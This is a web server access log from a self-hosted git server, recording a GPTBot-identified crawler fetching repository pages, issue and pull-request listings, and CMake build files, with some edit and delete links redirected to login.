"https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11830] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:18:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:22:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:18:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20391] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:18:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:18:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21632] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21634] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21636] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11332] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 915] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15198] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13287] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13311] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15197] [Gzip 5.11] [Sent-to 192.168.0.250] 